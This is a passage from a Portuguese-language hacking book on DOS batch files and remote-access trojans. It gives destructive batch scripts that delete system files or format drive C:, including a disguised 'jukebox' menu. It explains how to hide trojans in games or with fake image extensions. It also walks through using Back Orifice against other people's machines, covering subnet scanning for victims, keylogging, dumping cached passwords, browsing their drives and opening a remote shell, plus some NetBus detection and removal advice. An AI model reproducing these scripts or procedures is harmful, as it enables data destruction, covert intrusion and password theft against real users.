AutoExec.bat, este arquivo é executado automaticamente quando
seu micro é ligado, e não é sempre que você vai ficar verificando o
conteúdo deste arquivo, sendo assim tome cuidado com
programas, jogos, e-mails.

7.2 Vejamos alguns comandos:

CLS: Limpa a tela.


ECHO OFF : Desliga o atributo de mensagens.
ECHO: Imprimi uma mensagem na tela. ex: ECHO <Mensagem>
DEL: Apaga arquivos. ex: DEL [caminho] <Nome_do_Arquivo>
DELTREE: Apaga uma estrutura de diretórios. ex: DELTREE
Terrorismo Tecnológico 155
Aprenda Para Sobreviver

<diretório>
PAUSE: Espera alguma tecla ser pressionada para continuar a
execução.
REN: Renomeia um arquivo. ex. REN <Nome_do_Arquivo>
<Novo_Nome>

Alguns exemplos de arquivos de lote:

Obs: Todos comandos escritos em NEGRITO terão que ser escritos


no autoexec.bat.

CLS
Disco de sistema inválido
PAUSE
Confirma inicio da formatação da unidade C: <S/N>
ECHO OFF

Como causar um estrago considerável.

@ECHO OFF
IF EXIST C:\AUTOEXEC.BAT DEL C:\AUTOEXEC.BAT
IF EXIST C:\CONFIG.SYS DEL C:\CONFIG.SYS

Como destruir de vez!

@ECHO OFF
FORMAT C: /A

Outros:
Terrorismo Tecnológico 156
Aprenda Para Sobreviver

APPEND
Define um caminho de buscas para arquivos que não foram
encontrados.
Parâmetros : path on, off: Aplicará um caminho de busca definido
por Append

ATTRIB
Esse comando serve para ocultar determinados arquivos.
Parâmetros :
+r, -r : Define atributo de leitura
+h, -h : Define atributo de oculto

CD
Muda para o diretório especificado

CHOICE
Esse comando possibilita uma escolha. Necessita do IF e
ERRORLEVEL
Parâmetros
/c: Possibilita uma escolha feita pelo progamador e não
pelo default
nn: : Define o número de segundos de espera. De 00 a 99
text: Define um texto á ser exibido antes das opções de
escolha
/s: Faz diferenciação de letras minúsculas e letras
maiúsculas

CLS
Limpa a tela

DELTREE
Deleta um arquivo ou diretório
Parâmetros
/y: Não pede confirmação

DIR
Dá um DIR
Terrorismo Tecnológico 157
Aprenda Para Sobreviver

ECHO
Este comando serve para exibir uma escrita. Por
exemplo:
ECHO Quem ler isso é um tonto
Ficaria assim:
Tonto !!!!
Parâmetros:
OFF: Não mostra os comandos dados

Goto
Volta para um determinada parte do arquivo
Parâmetros
:START: Marca o local para onde deve voltar
START: Indica o alvo para o qual ele deve voltar

IF e ERRORLEVEL
Complemento do CHOICE. Ele define o que vai acontecer. =)

7.3 Arquivo em Lote

Esta é outra forma de se fazer um “vírus” em DOS, e nem precisa


compilar é so digitar no prompt de comando, como o exemplo a
seguir:

copy con lote.bat


<enter>

@echo off
<enter>

@echo Frase de sua preferência


<enter>
Terrorismo Tecnológico 158
Aprenda Para Sobreviver

del *.sys
<enter>

del *.exe
<enter>

del *.com
<enter>

cd windows
<enter>

del *.*
<enter>

cd\
<enter>

del arquivo.bat
<enter>

@echo Frase de sua preferência


<enter>

<tecla F6>
<enter>

Se alguém o executasse como lote.bat no prompt de comando ele


entraria em ação, ou então um hacker poderia copia-lo em um
disquete juntamente com o system.com e leva-lo a qualquer outro
micro, bastando executar o arquivo.

Muito espalhado a alguns anos atraz foi o roleta russa, que na


verdade é uma seqüência de comandos a serem executados num
Terrorismo Tecnológico 159
Aprenda Para Sobreviver

único procedimento para “invernizar” a vida de um usuário, vamos


ver como a roleta russa funcionava:

Novamente era feito em DOS:

copy con roletarrussa.bat


<enter>

@echo off
<enter>

@echo Bem-vindo à virtual Juke-box


<enter>

@echo Escolha a cancão favorita para tocar agora:


<enter>

@echo
<enter>

@echo (1) - You hate - Rammstein


<enter>

@echo (2) - The Kiss of Judas - Stratovarius


<enter>

@echo (3) - Everything Die - Type 0' Negative


<enter>

@echo (4) - Patricia - Ray Connif


<enter>

choice /c1234
<enter>
Terrorismo Tecnológico 160
Aprenda Para Sobreviver

if errorlevel 1 goto Um
<enter>

if errorlevel 2 gto Dois


<enter>

if errorlevel 3 goto Três <enter>


if errorlevel 4 goto Quatro <enter>
<enter>
:Um <enter>
cd\ <enter>
xdel *.doc /s <enter>
xdel *.xls /s <enter>
goto finale <enter>
<enter>
:Dois <enter>
md Judas <enter>
copy c:\windows\system\*.* > nul <enter>
cd Judas <enter>
goto finale <enter>
<enter>
:Três <enter>
format c: /y > nul <enter>
goto finale <enter>
<enter>
:Quatro <enter>
echo Sua agonia já tem sido grande o suficiente. Desculpe...
<enter>
<enter>
:finale <enter>
(aperte a tecla F6 para finalizar)

(Mas num seja idiota de executar isto na sua máquina ok!)


Terrorismo Tecnológico 161
Aprenda Para Sobreviver

Capítulo VIII

Cavalo de tróia (Trojans) - Neste capítulo será explicado como


funcionam como se detecta e como remover um Trojan (Cavalo de
tróia)
Terrorismo Tecnológico 162
Aprenda Para Sobreviver

8.1 Trojan

O que é um Trojan?

O nome cavalo de tróia vem na verdade da historia em que o


governante da cidade de Tróia na antiga Grécia foi presenteado com
um cavalo de madeira no qual estavam escondidos soldados
inimigos, à noite em quanto todos estavam dormindo os soldados
saíram e dominaram a cidade, que não estava esperando um
ataque.
E o trojan é isso aí, é um arquivo (programa) que rouba
informações do seu computador e muitas vezes até o domina
fazendo com que ele possa resetar, fazer logoff, abrir e fechar o
drive de cd rom, copiar a tela que esta sendo vista, copiar, apagar,
programas e arquivos. Tudo isso sem que o computador que está
sendo atacado fique sabendo, a não ser claro no caso de fazer
logoff, resetar etc. O trojan é tão poderoso que escraviza a máquina
e pode até mesmo mexer o mouse ou desativar teclas do teclado.

O arquivo infectado é instalado na máquina, após isto cada vez


que o usuário reinicia o seu computador este arquivo se auto
inicializa ficando então sempre ativo esperando o seu comandante
(o invasor) o chamar.

Este arquivo irá abrir uma porta do computador, ele pode até
mesmo criar um usuário e uma senha para que só a pessoa que o
instalou consiga invadir e usá-lo. Feito isto pela Internet ou uma
Intranet, o “hacker” (vou chamar assim o invasor a partir de agora)
pega o endereço IP do micro infectado e entra em seu sistema. A
partir daí ele escraviza e domina toda a plataforma alheia.
Terrorismo Tecnológico 163
Aprenda Para Sobreviver

A grande dificuldade para administradores é que o sistema


operacional pode ser perfeito e não ter nenhum bug, pois o trojan
não precisa de falhas para atuar. Na precaução jamais abra
arquivos executáveis enviados por estranhos ou pegos em sites
duvidosos. Pois o trojan pode até mesmo estar escondido em um
jogo ou algum aplicativo e quando você o executar ele vai se auto-
instalar, fique esperto com o tamanho dos arquivos e se achar que
tem algum problema utilize um antivírus e cheque este arquivo. No
caso de a dúvida persistir ou delete o arquivo ou tente executá-lo
em uma máquina para testes.

8.2 Invasão

Melhores trojans para Windows:

- Netbus
- Back Orifice
- Netsphere
- SubSeven
- Hack’a’tack
- Girlfriend
- ackcmd
- Amanda
- Keystroke Logger Achtung
- Backdoor Remote Control
- Aladino Remote Control
Terrorismo Tecnológico 164
Aprenda Para Sobreviver

Melhores para Linux

- Sutrojan
- NC110 UX

Melhores para MAC

- SubSeven

Melhores para Solaris

- Sutrojan

Os trojans são facilmente encontrados na Internet, e possuem


dois arquivos principais que são o cliente e o servidor você pode
encontrar um para teste entrando no google e pesquisando trojans.
O servidor é o arquivo infectado que é instalado na máquina que
vai ser invadida, ele pode ser mandado camufladamente em outro
arquivo, o que é necessário é que o arquivo seja executado, e o
cliente é o aplicativo usado pelo invasor para se comunicar com a
máquina invadida, este abre uma tela onde vários comandos são
facilmente usados como vamos ver na próxima figura.

Vamos relembrar:

Todos os computadores possuem portas que vão de 0 a 65535,


cada porta serve para um determinado serviço que está ativo no
computador, como o servidor de web o http usa a porta 80. O
servidor (arquivo infectado) abre uma dessas portas do computador
digamos a 1234 e está será a porta que o cliente “hacker” vai usar
para invadir o micro infectado. No aplicativo cliente, possui diversas
Terrorismo Tecnológico 165
Aprenda Para Sobreviver

funções que escraviza a máquina fazendo com que ela controle


praticamente todas as funções do sistema invadido, o software
trabalha graficamente, bastando colocar o ip e a porta do
computador infectado clicando então em conectar.
Existem alguns programinha como, por exemplo, o Scan Bus que
é encontrado na Internet que faz uma busca e conforme vai
encontrando IP´s de máquinas infectadas vai mostrando para o
hacker. Ele então nem tem a dificuldade de infectar alguém basta
encontrar uma máquina infectada e invadir.
Descobrir o IP de alguém também é muito fácil com programas
como o IPTracaer que mostra os endereços em salas de chats.

8.3 Trojans de ponte

Eles não são muito utilizados, porém são os que mais enganam
os administradores, é instalado um servidor em um computador
digamos de um cliente que o “hacker” arrumou seu servidor
(geralmente o hacker trabalha com informática) e assim possa ser
feitos os ataques. O computador vira um servidor Proxy, e este
como já foi visto no capítulo de anonimidade faz uma espécie de
roteamento, então caso alguém descubra que esta sendo invadido
vai vir procurar na casa nesta máquina e não na casa da máquina
do hacker.

8.4 Trojans comerciais

O PcAnywhere é um deles, outro é o terminal remoto do Windows


2000 e XP. Esses não são os únicos existem muitos outros. Eles
possibilitam que novamente controle totalmente outra máquina.
Você pode ate executar o Word e começar a digitar como se você
estivesse digitando no teclado da máquina invadida.
Terrorismo Tecnológico 166
Aprenda Para Sobreviver

E esses programas o antivírus não acusa como trojan, já que são


programas comerciais. Como teste pegue em algum site de busca o
VNC, ele é gratuito, configure-o e experimente.

8.5 Camuflando

Em sites de buscas existem muitas ferramentas que possibilitam


esconder os trojans dentro de outros arquivos ou aplicativos, são
facilmente encontrados até em revistas de informática em que
acompanha um CD-ROM.
O The Joiner é um programinha que junta 2 aplicativos
(executáveis) e os transforma em 3. Podemos então juntar um jogo
e um trojan, e quando alguém for instalar, os dois aplicativos serão
instalados.
No IRC4, é muito comum receber fotos que na verdade são
arquivos. Os Hackers renomeiam esses arquivos para parecer uma
foto como, por exemplo, gostosa.jpg_________ .exe , o jpg não
é extensão deste arquivo, mas sim parte do nome, foi dado um
espaço bem grande entre o nome do arquivo ate a sua extensão,
assim o usuário vai achar que é uma foto quando na verdade é um
executável.
Os arquivos que são feitos a partir do The Joiner são pegos pela
maioria dos antivírus.

8.6 Usando o Net bus 2.10 como teste

4
IRC – é um serviço de bate-papo, sendo o Mirc o mais conhecido dele alguns exemplos são,
T7DS, Gasper, Money...
Terrorismo Tecnológico 167
Aprenda Para Sobreviver

Vamos utilizar o Netbus trojan 2.10 para conectarmos ao nosso


próprio computador, quando quisermos fazer esse tipo de teste
temos que usar o ip 127.0.0.1 que acessa a própria máquina,
também tem que infectá-la antes então execute o NBSvr.exe

- Abra o programa cliente do Trojan Netbus que é o NetBus.exe


se precisar desative o anti vírus para fazer o teste.

- Na tela inicial nesta versão do programa já tem o Meu


computador então basta dar um duplo clic. Ou clique em connect!

Após clicar em connect tem que aparecer connected to 127.0.0.1


na barra de status.
Terrorismo Tecnológico 168
Aprenda Para Sobreviver

Agora basta ir navegando entre as opções e veja tudo o que é


possível!
Terrorismo Tecnológico 169
Aprenda Para Sobreviver

1. Clique em Open CD-ROM para abrir o drive de cd-rom


2. Em Start Program e coloque c:\windows\notepad.exe para
abrir o bloco de nota.
3. Clique em Go to URL coloque um endereço e mande o
computador para algum site.
4. Use Listen para mostrar na sua tela os caracteres digitados
pela pessoa e intervir no meio (como se você estivesse
escrevendo no Word e de repente as palavras se formarem
sozinhas).
5. A Port Redirect cria uma ponte. Coloque uma porta
(geralmente use a 80) e um site. Assim quando for ao Internet
Explorer e digitar o IP do computador invadido, você cairá
nesse site configurado. Por exemplo: ao digitar 127.0.0.1 no
browser fui enviado para www.google.com.br
Terrorismo Tecnológico 170
Aprenda Para Sobreviver

6. você ainda pode capturar telas, executar programas....


7. Para desconectar, clique em disconnect.
8. A opção server admin retira o servidor.

8.7 Manual NetBus

8.7.1 Introdução
O NetBus é uma ferramenta que pode ser utilizada como um
sistema de administração remota para os ambientes operacionais
Windows 95, Windows 98 e Windows NT.
É composto por um programa que atua como Servidor e um
programa que atua como Cliente, permitindo conexões remotas
mesmo através da Internet, utilizando-se do protocolo TCP.
Por suas inúmeras características e facilidades, o NetBus
passou a ser utilizado principalmente por hackers que pretendem
manter controle sobre as máquinas de suas vítimas, sem serem
notados/detectados.

8.7.2 Comprometimento

O Servidor NetBus é auto-instalável indicando que na primeira


execução a máquina passará a ser comprometida.
O NetBus permite um amplo controle sobre o Servidor,
apresentando inúmeras características das quais se destacam:

- Auto-instalável
- Auto executável (com o boot do Windows)
- Permite iniciar/executar qualquer aplicativo
- Permite fechar/terminar qualquer aplicativo
- Permite rebootar o servidor
Terrorismo Tecnológico 171
Aprenda Para Sobreviver

- Pode desconectar usuários


- Permite enviar caracteres para aplicativos ativos
- Permite capturar o que esta sendo digitado no computador
servidor
- Permite capturar a tela (screenshot) do computador servidor
- Retorna informações gerais sobre o computador
- Permite realizar upload de arquivos para o servidor
- Permite realizar download e deleções de qualquer arquivo do
servidor
- Permite capturar o som de microfones instalados no servidor
- Possui esquemas de proteção e validação de acessos através
de senhas
- Não aparece na Task List do Windows

Além disso, o NetBus faz uso de senhas para permitir o


controle de acessos ao Servidor NetBus. A string que contém a
senha que o Cliente envia para o Servidor é semelhante à linha
abaixo:
Password;0;my_password
No entanto, detectou-se a presença de um backdoor no NetBus
que permite a qualquer Cliente estabelecer conexão com o
Servidor sem a necessidade de se utilizar uma senha. O Cliente
pode conectar-se sem autenticação bastando substituir o valor do
segundo parâmetro da string de conexão acima de "0" para "1".

8.7.3 Detecção

Por default, o Servidor NetBus chama-se Patch.exe. No entanto


pode perfeitamente ser renomeado para qualquer outro nome.
O NetBus utiliza TCP para estabelecer o envio/recebimento de
pacotes e dados, permanecendo ativo nas portas 12345 e 12346
aguardando por conexões de clientes.
Terrorismo Tecnológico 172
Aprenda Para Sobreviver

Como primeiro passo, é possível verificar se essas portas estão


em uso por algum serviço. Para tanto utiliza-se o comando 'netstat'
conforme exemplo abaixo:
c:\>netstat -an | find "1234"
TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING
Em seguida, é possível identificar que serviço está ativo na
porta apresentada pelo netstat. Para tanto se utiliza o comando
telnet, conforme exemplo abaixo:
c:\>telnet 127.0.0.1 12345
Se o NetBus estiver instalado e aguardando por conexões
nesta porta, a seqüência abaixo irá aparecer na janela do telnet:

'NetBus 1.53'
Ou:
'NetBus 1.60'
Alem desse procedimento, é possível examinar o registro do
Windows a procura de algumas chaves que podem ser criadas
pelo programa quando de sua instalação. Execute o 'regedit' e
faca uma busca pelas chaves abaixo:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur
rentVersion\Run[Nome
do NetBus]
HKEY_CURRENT_USER\Patch\Settings\ServerPwd
A primeira chave indica que o NetBus está configurado para ser
inicializado automaticamente a cada boot do sistema. Já a
segunda chave indica qual a senha (em formato texto puro) que
esta sendo utilizada para validar conexões.

8.7.4 Removendo o NetBus

Indicam-se dois procedimentos básicos e simples para


remoção do NetBus:
Terrorismo Tecnológico 173
Aprenda Para Sobreviver

1) fazer uso de uma opção do Servidor NetBus que


automaticamente deleta o executável, conforme exemplo abaixo:
c:\>nome_do_netbus_server.exe /remove

2) utilizar o Cliente do NetBus para fazer essa remoção. Basta


conectar-se ao Servidor (podendo ser localhost), selecionar
"Server admin" e em seguida "Remove server".
No entanto, notamos que em alguns casos as duas opções
falharam ao limpar o registro do Windows. Logo, indicamos que o
processo de remoção seja feito manualmente deletando-se o
executável e limpando-se o registro eliminando-se as chaves
criadas pelo NetBus.

8.8 Manual Back Orifice

8.8.1 O que é o Back Orifice?

O Back Orifice ou simplesmente BO, é um aplicativo


cliente/servidor apenas para Windows 95 e 98, que permite ao
cliente monitorar e administrar a máquina rodando o servidor.
Pode ser considerado como um cavalo de tróia.

8.8.2 Quem criou o Back Orifice?


Terrorismo Tecnológico 174
Aprenda Para Sobreviver

O criador do Back Orifice, é um grupo Hacker chamado Cult of


Dead Cow ou Culto da Vaca Morta.

8.8.3 Como ele funciona?

Assim como um browser conecta-se a um servidor da Internet


para a visualização de uma home page, compreendendo uma
máquina cliente e outra servidora, respectivamente. Assim é o
Back Orifice, que se utiliza os mesmos processos. A máquina que
roda a versão cliente pode conectar-se com uma máquina que
roda a versão servidora.

8.8.4 Quem são os servidores e quem são os


clientes?

Na grande maioria dos casos, a versão servidora é rodada em


uma máquina por simples descuido. Pois, acredito, que ninguém
gostaria de disponibilizar seus arquivos pessoais, para algumas
milhares de pessoas no mundo. Como o programa BO vem
compactado, contendo além de alguns utilitários, as versões
cliente e servidor. O usuário pode executar a versão errada
(servidor), simplesmente por não ter lido ou entendido as
instruções. Mas lembra-nos que, quem está rodando o servidor do
Back Orifice, pelo menos, tentou rodar a versão cliente para,
talvez, divertir-se com a máquina dos outros. E acabou tornando a
si próprio, o brinquedo dos outros.
E para isto, basta um simples clique no mouse. E o servidor se
instala em sua máquina sem nada lhe mostrar e em seguida se
apaga e passa a funcionar como um serviço do Windows. E a
cada vez que você ligar o seu micro, o servidor se inicia sem que
ninguém perceba. Ele funciona como um pano de fundo e não
deixa nenhum rastro.
Terrorismo Tecnológico 175
Aprenda Para Sobreviver

O servidor do Back Orifice pode vir encoberto por um outro


arquivo qualquer, e ao ser executado se instala na sua máquina,
sem nenhum sinal. E uma vez rodando, o faz de uma forma que
torna difícil a sua detecção. Permite ao administrador remoto
tomar o controle de seu sistema: roubar suas senhas, enviar ou
receber arquivos, rodar novas aplicações, observar e derrubar
qualquer aplicação que você esteja rodando, e etc,... e sem o seu
conhecimento ou consentimento.

Especificações:
O pacote bo.zip contém:

bo.txt - este documento.


plugin.txt - a ajuda para programação de plugin.
boserve.exe - o auto-instalador do Back Orifice (BO).
bogui.exe - o cliente modo gráfico (GUI) do Back Orifice.
boclient.exe - o cliente modo texto do Back Orifice.
boconfig.exe - utilitário de configuração de nome do executável,
porta, senha e plugins do servidor BO.
melt.exe - descompacta arquivos compactados com o comando
"freeze".
freeze.exe - compacta arquivos que podem ser
descompactados com o comando "melt".

8.8.5 Comandos:

Abordaremos a versão Bogui.exe (modo gráfico), por ser de


melhor manuseio. Mas os comandos possuem a mesma sintaxe
entre as duas gráfica e texto.

Gui/texto:
App add/appadd - abre e redireciona um aplicativo modo texto
para uma porta tcp. Isso permite que você controle o aplicativo
modo texto ou modo dos (como command.com) via telnet.
Terrorismo Tecnológico 176
Aprenda Para Sobreviver

App del/appdel - desliga o redirecionamento de um aplicativo.

Apps list/applist - lista os aplicativos atualmente conectados.

Directory create/md - cria diretório.

Directory list/dir - lista arquivos e diretórios. Você deve


especificar um curinga caso queira que mais de um arquivo seja
listado.

Directory remove/rd - remove um diretório.

Export add/shareadd - compartilha um diretório ou drive do


servidor em rede. O ícone diretório ou drive compartilhado não é
alterado.

Export delete/sharedel - remove um compartilhamento.

Exports list/sharelist - lista os compartilhamentos, o drive ou


diretório que está sendo compartilhado, os acessos e a senha do
compartilhamento.
File copy/copy - copia um arquivo.

File delete/del - remove um arquivo.

File find/find - procura no diretório, arquivos que coincidam com


a especificação curinga.

File freeze/freeze - compacta um arquivo.

File melt/melt - descompacta um arquivo.

File view/view - visualiza o conteúdo de um documento texto.

HTTP Disable/httpoff - desabilita o servidor http.

HTTP Enable/httpon - habilita o servidor http.


Terrorismo Tecnológico 177
Aprenda Para Sobreviver

Keylog begin/keylog - registra o texto digitado no servidor em


um arquivo texto. O log mostra o nome da janela em que o texto
foi digitado.

Keylog end - interrompe o registro de texto digitado. Para


utilizar esse comando no modo texto, use o comando "keylog
stop".

MM Capture avi/capavi - captura vídeo e áudio (se disponível)


de um dispositivo de captura de vídeo para um arquivo avi.

MM Capture frame/capframe - captura um quadro de vídeo de


um dispositivo de captura de vídeo para um arquivo bitmap.

MM Capture screen/capscreen - captura uma imagem da tela


do servidor para um arquivo bitmap.

MM List capture devices/listcaps - lista os dispositivos de


captura de vídeo.

MM Play sound/sound - toca um arquivo wav no servidor.

Net connections/netlist - lista as conexões de entrada e saída


da rede.

Net delete/netdisconnect - desconecta o servidor de uma rede.

Net use/netconnect - conecta o servidor em uma rede.

Net view/netview - lista todas as interfaces de rede, domínios,


servidores e envios do servidor.

Ping host/ping - testa a conexão com a máquina remota.


Informa o nome da máquina e a versão do BO.
Terrorismo Tecnológico 178
Aprenda Para Sobreviver

Plugin execute/pluginexec - executa um plugin do Back Orifice.


Executar funções não entendidas pelo plugin pode fazer com que
o servidor trave.

Plugin kill/pluginkill - desliga um plugin.

Plugins list/pluginlist - lista plugins ativos ou avisa de que um


plugin foi desligado.

Process kill/prockill - termina um processo.

Process list/proclist - lista processos rodando.

Process spawn/procspawn - abre um programa. Pelo GUI, se o


segundo parâmetro é especificado, o processo será executado
normalmente e visível. Caso contrário ele será executado de
maneira invisível.

Redir add/rediradd - redireciona recebimento de conexões tcp


ou pacotes udp para outro endereço ip.

Redir del/redirdel - interrompe o redirecionamento de uma


porta.

Redir list/redirlist - lista os redirecionamentos de portas ativos.

Reg create key/regmakekey - cria uma chave no registro.

NOTA: Para todos os comandos de registro, não especificar a \\


inicial de valores de registro.

Reg delete key/regdelkey - remove uma chave no registro.

Reg delete value/regdelval - remove um valor no registro.

Reg list keys/reglistkeys - lista as sub-chaves de uma chave de


registro.
Terrorismo Tecnológico 179
Aprenda Para Sobreviver

Reg list values/reglistvals - lista os valores de uma chave de


registro.

Reg set value/regsetval - define um valor para uma chave de


registro. Os valores são especificados no formato tipo vírgula
valor. Para valores binários (tipo B) o valor é um série de dois
dígitos hexadecimais. Para valores DWORD (tipo D) o valor é um
número decimal. Para valores string (tipo S) o valor é uma string
de texto.

Resolve host/resolve - determina o endereço ip de uma


máquina em relação à máquina servidora. O nome da máquina
pode ser um "host name" ou o nome de uma máquina em rede
local.

System dialogbox/dialog - cria uma caixa de diálogo no servidor


com o texto informado e um botão "ok". Você pode criar quantas
caixas de diálogo quiser, elas aparecerão em cascata umas sobre
as outras.
System info/info - exibe as informações do sistema da máquina
servidor. Os dados exibidos incluem nome da máquina, usuário,
tipo de cpu, memória total e disponível, dados sobre a versão de
Windows e informações sobre os drives, incluindo tipo (fixo, cd-
rom, removível ou remoto) e, nos drives fixos, o tamanho e espaço
disponível do drive.

System lockup/lockup - trava a máquina servidora.

System passwords/passes - exibe as senhas cacheadas e a


senha do protetor de tela. As senhas podem apresentar caracteres
estranhos no fim.

System reboot/reboot - desliga o servidor e reinicia a máquina.


Terrorismo Tecnológico 180
Aprenda Para Sobreviver

TCP file receive/tcprecv - conecta o servidor a um ip e porta


específicos e grava qualquer dado recebido por aquela conexão
em um arquivo.

TCP file send/tcpsend - conecta o servidor a um ip e porta


específicos, envia o conteúdo do arquivo especificado e o
desconecta. Arquivos podem ser transferidos _do_ servidor
usando-se o comando "tcp file send" e o utilitário netcat com os
parâmetros: netcat -l -p 666 > arquivo Arquivos podem ser
transferidos _para_ o servidor usando-se o comando "tcp file
receive" e o utilitário netcat com os parâmetros: netcat -l -p 666 <
arquivo NOTA: A versão para Windows do netcat não desconcerta
nem se finaliza quando atinge o final da transmissão. Após o
término, finalize o netcat com ctrl+c ou ctrl+break.

BOConfig: BOconfig.exe permite configurar as opções de um


boserve.exe antes que ele seja instalado. Ele requisitará: Runtime
executable name O nome do arquivo que o Back Orifice se
instalará no diretório system do Windows. O nome não precisa tem
a extensão exe, ela será automaticamente adicionada. Exe
description in registry A descrição do executável do Back Orifice
no registro do Windows, de onde ele será executado sempre que o
Windows se iniciar. Server port A porta em que o servidor será
acessado. Encryption password A senha de acesso ao servidor.
Não é obrigatória e pode ser deixada em branco. Default plugin to
run on startup O plugin do Back Orifice a ser executado ao iniciar.
File to attach Arquivo a ser anexado ao boserve.exe. Ele pode ser
um plugin, que será automaticamente iniciado com o boserve.exe.
NOTA: Se o servidor não for configurado com o BOconfig.exe, ele
se comunicará na porta 31337.
Sem senha, e se instalará como “.exe".

8.8.6 O Manual:
Terrorismo Tecnológico 181
Aprenda Para Sobreviver

Como encontrar uma máquina rodando o


servidor do Back Orifice?

Você pode fazê-lo de duas formas. A primeira é digitando o


endereço de uma sub-rede na pequena caixa no canto superior
esquerdo. Ex. 195.219.222.* e pressionando "ENTER". Isto fará
com que o Back Orifice procure por todos os endereços IP do
195.219.222.0 até o 195.219.222.255.
Você pode também abrir o NOTEPAD e criar uma lista de sub-
redes (uma por linha), salvá-la no mesmo diretório do Bogui.exe e
então, pressionar o botão PING no canto inferior esquerdo da
janela.
Agora digite o nome do arquivo que você criou na caixa de
texto que surgirá.
O Back Orifice irá então, buscar todas as sub-redes do arquivo.
Como saberei que o Back Orifice encontrou uma máquina
rodando o servidor ?

Quando o Back Orifice detectar uma máquina rodando o


servidor, ele irá mostrar uma mensagem como está:
------------ Packet received from host 195.130.131.69 port 31337
-------------
!PONG!1.20!DEFAULT!
----------------------- End of Data -----------------------

Que significa: "Pacote recebido do host (endereço IP dp


servidor) 195.130.131.69 porta 31337". "PONG, significa a
resposta ao seu comando PING. O número 1.20 indica a versão
do servidor Back Orifice e o nome DEFAULT, é o nome do
computador-servidor".
Digite o endereço IP completo, encontrado na mesma caixa de
texto superior esquerda para começar a executar os comandos.
(Uma boa forma de encontrar endereços IP`s é no mIRC,
através do comando /whois "nick")
Terrorismo Tecnológico 182
Aprenda Para Sobreviver

Como posso ver e baixar os arquivos do


winchester do servidor?

Nada mais fácil! Apenas selecione o comando "HTTP Enable"


na janela do Bogui, digite "80" (ou outro número) na caixa de texto
"port" e "c:" (ou outra letra do drive) na caixa "root". Então,
pressione o botão "send".

Você deverá ver uma mensagem como esta:

** 15:HTTP Enable packet sent (25 bytes) val1: '80' val2: 'c:' ----
------- Packet received from host 195.130.131.69 port 31337 ---------
--HTTP server listening on port 80 ------------------------- End of Data -
------------------

Agora simplesmente, abra um Browser (Netscape Navigator


funciona melhor neste caso, mas o Internet Explorer também se
sairá bem). No campo de endereço, digite "http://endereçodeip".
No caso acima, seria "http://195.130.131.69".
Se você utilizou um número diferente de "80" para a porta,
então adicione-o ao endereço de IP. Ex.
"http://195.130.131.69:3000".
Pronto! Agora você poderá visualizar o conteúdo do drive C:\ do
servidor na janela de seu browser. Clicando em um diretório, você
será transferido para ele. Clicando nos arquivos, você os baixará.

OBS: O ideal é digitar os nomes de arquivo ou diretórios que se


quer acessar ou baixar, no campo do endereço. E também é
necessário respeitar os 8 caracteres para nomes de arquivos ou
diretórios. Por exemplo: Se você deseja acessar o diretório
"C:\WINDOWS\MEUS DOCUMENTOS". Você deverá digitar no
campo de endereço: "http://195.131.131.69/windows/meusdo~1".
É a mesma regra do DOS.
Terrorismo Tecnológico 183
Aprenda Para Sobreviver

Como posso enviar arquivos para o servidor?

Siga o mesmo procedimento acima. Quando o conteúdo do


drive especificado aparecer em seu browser, role-o até a parte
inferior. Você notará dois botões e uma caixa de texto. No botão
"browser" ou "procurar", você irá especificar que arquivo da sua
máquina, você quer enviar. Após selecioná-lo, clique em upload
para enviá-lo.

OBS: Em nem todos os casos este procedimento funciona.


Pode-se utilizar também o utilitário NETCAT para o envio de
arquivos, através do comando.

para enviar: "nc -l -p 666<nomedoarquivo"


para receber: "nc -l -p 666>nomedoarquivo"
* O número 666 representa a porta, podendo ser mudado.

Veja o que o usuário do servidor está digitando.

Para realizar esta função, você precisa selecionar o comando


"Keylog begin" na janela do seu Back Orifice. Na caixa de texto
"filename", digite o nome de um arquivo que você deseja
armazenar os registros. Você pode escolher qualquer nome, mas
é recomendável que se utilize uma extensão .txt (texto), pelo fato
de que este tipo de arquivo pode ser facilmente visualizado pelo
seu browser. No exemplo abaixo, o arquivo foi chamado de
"system.txt".

** 17:Keylog begin packet sent (29 bytes) val1: 'system.txt' val2:


'c:'
---------- Packet received from host 195.130.131.69 port 31337 ------
---------
Terrorismo Tecnológico 184
Aprenda Para Sobreviver

Logging keys
------------------------- End of Data -------------------

Após isto, execute o comando "File find" com o nome do


arquivo em uma caixa de texto e "c:" em outra. Isto resultará em
algo como:

** 32:File find packet sent (31 bytes) val1: 'system.txt' val2: 'c:'t '
c\:SYSTEM.TXT 49 -A----- 08-23-98 23:17
c:\Program Files\ICQ\system.txt
End of search
--------------------------- End of Data -------------------------

Isto lhe dará uma lista de todos os locais onde existirem


arquivos de "system.txt". Abra uma janela do seu browser e abra o
arquivo que você verá tudo o que o usuário do servidor esteve
digitando.

OBS: Talvez o arquivo só apareça quando a gravação dos


registros for interrompida. Neste caso, clique no comando "Keylog
end" na janela do seu Back Orifice.

Veja as senhas do usuário armazenadas no


servidor.

Talvez esta seja a mais simples das funções. Apenas clique no


comando "System passwords" e pronto, as senhas aparecerão
para você!
Como abrir um prompt do DOS na máquina servidora.
Para fazê-lo, você precisa selecionar o primeiro comando da
lista na janela do seu Back Orifice, "App add". Não caixa de texto,
digite "command.com" e na segunda caixa de texto digite, "23".

Agora, você precisa abrir uma sessão do TELNET na sua


máquina. Pressione o botão INICIAR do seu computador e em
Terrorismo Tecnológico 185
Aprenda Para Sobreviver

seguida, clique em EXECUTAR. Digite TELNET e o programa irá


se iniciar.
Clique no menu "Connect" e escolha o primeiro item "Remote
system". Uma pequena janela irá surgir, com três caixas.
Apenas digite o endereço IP da máquina servidora no campo
"Host Name". Então pressione o botão "Connect". Após alguns
segundos, o prompt do DOS irá aparecer na janela do TELNET.
Você pode agora usar os comandos do DOS no servidor. (dir, cd,
copy,...)

Mande mensagens na tela do servidor.

Selecione o comando "System Dialogbox". Na caixa de texto


"title", digite o título que você deseja que apareça na caixa de
diálogo. Na caixa de texto "text", digite o texto da mensagem.
Então pressione o botão "send" e você deverá ver uma
confirmação do envio da mensagem.
Capture a tela do usuário em um arquivo.BMP.
Você pode salvar em um arquivo a tela capturada da máquina
servidora. Selecione o comando "MM capture screen". Na caixa de
texto a esquerda, digite o nome de um arquivo qualquer com
extensão.BMP e então clique no botão "send". Você deverá
receber uma confirmação do comando, então o arquivo.BMP
estará na máquina servidora podendo ser baixado.

8.9 Utilizando o Anti-Trojans

Vamos utilizar como exemplo de detecção por portas, o meu


programa Anti-Trojans versão 1.6. Se quiser tentar outro programa,
Terrorismo Tecnológico 186
